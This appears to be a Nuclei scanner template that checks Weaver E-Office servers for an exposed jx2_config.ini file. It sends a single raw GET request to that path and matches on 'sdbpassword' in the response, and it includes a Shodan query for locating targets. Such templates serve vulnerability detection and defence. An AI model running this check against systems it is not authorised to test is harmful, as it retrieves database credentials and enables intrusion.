id: Weaver_E-Office_jx2_config_information_leakage

info:
  name: Weaver_E-Office_jx2_config_information_leakage
  author: HK
  severity: high
  description: Weaver E-Office jx2_config information leakage
  metadata:
    max-request: 1
    shodan-query: body="/newplugins/js/pnotify/jquery.pnotify.default.css"
    verified: true

http:
- raw:
  - |+
    @timeout: 30s
    GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
    Host: {{Hostname}}
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate
    Cache-Control: no-cache
    Accept-Language: zh-CN,zh;q=0.9
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache

  redirects: true
  matchers-condition: and
  matchers:
    - type: word
      part: body
      words:
        - sdbpassword